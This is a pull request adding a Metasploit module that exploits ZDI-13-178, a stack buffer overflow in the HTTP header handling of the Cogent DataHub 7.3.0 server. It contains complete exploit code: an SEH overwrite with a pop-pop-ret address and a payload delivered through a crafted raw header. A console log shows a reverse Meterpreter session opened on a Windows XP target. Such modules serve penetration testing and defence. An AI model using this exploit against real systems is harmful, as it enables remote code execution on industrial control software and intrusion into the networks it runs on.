### PR TITLE
Add module for ZDI-13-178

### DIFF
--- a/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb
+++ b/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb
@@ -1,0 +1,101 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::Remote::Seh
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Cogent DataHub HTTP Server Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a stack based buffer overflow Cogent DataHub 7.3.0. The
+				vulnerability exists in the HTTP server, while handling HTTP headers, where the
+				strncpy() function is used in a dangerous way. This module has been tested
+				successfully on Cogent DataHub 7.3.0 (Demo) on Windows XP SP3.
+			},
+			'Author'         =>
+				[
+					'rgod <rgod[at]autistici.org>',	# Vulnerability discovery
+					'juan vazquez', # Metasploit module
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'OSVDB', '95819'],
+					[ 'BID', '53455'],
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-178' ],
+					[ 'URL', 'http://www.cogentdatahub.com/Info/130712_ZDI-CAN-1915_Response.html']
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'Space'       => 33692,
+					'DisableNops' => true,
+					'BadChars'    => "\x00\x0d\x0a\x3a"
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					# Tested with the Cogent DataHub 7.3.0 Demo
+					# CogentDataHubV7.exe 7.3.0.70
+					['Windows XP SP3 English / Cogent DataHub 7.3.0',
+						{
+							'Ret'         => 0x7ffc070e, # ppr # from NLS tables # Tested stable over Windows XP SP3 updates
+							'Offset'      => 33692,
+							'CrashLength' => 4000 # In order to ensure crash before the stack cookie check
+						}
+					],
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Jul 26 2013'
+		))
+
+	end
+
+	def check
+		res = send_request_cgi({
+			'uri'          => "/datahub.asp",
+			'method'       => 'GET',
+		})
+
+		if res and res.code == 200 and res.body =~ /<title>DataHub - Web Data Browser<\/title>/
+			return Exploit::CheckCode::Detected
+		end
+
+		return Exploit::CheckCode::Safe
+	end
+
+	def exploit
+		print_status("Trying target #{target.name}...")
+
+		off = target['Offset'] + 8 # 8 => length of the seh_record
+		bof = payload.encoded
+		bof << rand_text_alpha(target['Offset'] - payload.encoded.length)
+		bof << generate_seh_record(target.ret)
+		bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + off.to_s).encode_string
+		bof << rand_text(target['CrashLength'])
+
+		print_status("Sending request to #{rhost}:#{rport}")
+
+		send_request_cgi({
+			'uri'          => "/",
+			'method'       => 'GET',
+			'raw_headers'  => "#{bof}: #{rand_text_alpha(20 + rand(20))}\r\n"
+		})
+
+	end
+end
+


### PR DESCRIPTION
Tested successfully on Cogent DataHub 7.3.0 (Demo) on Windows XP SP3.

Because of stack cookies and safeseh looks difficult to write the exploits for other windows versions. Even when there are some safeseh=false modules, they are rebased, so don't look like a reliable option.

Anyway writing the module for Windows XP SP3 for coverage, and is scada related module, so I guess still could be useful in some case.

The pop#pop#ret pointer is stable over updates on Windows XP SP3 according to my testing, but would love to listen if it works for others too.

Finally, I don't know if the DEMO for 7.3.0 is available anymore on the Cogent HomePage. Let me know if you need the DEMO installer for 7.3.0 via email.

```
msf exploit(cogent_datahub_request_headers_bof) > check
[*] The target service is running, but could not be validated.
msf exploit(cogent_datahub_request_headers_bof) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Trying target Windows XP SP3 English / Cogent DataHub 7.3.0...
[*] Sending request to 192.168.172.244:80
[*] Sending stage (751104 bytes) to 192.168.172.244
[*] Meterpreter session 3 opened (192.168.172.1:4444 -> 192.168.172.244:1027) at 2013-08-16 18:10:31 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysingo
[-] Unknown command: sysingo.
meterpreter > pwd
C:\Program Files\Cogent\Cogent DataHub
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 3 closed.  Reason: User exit

```
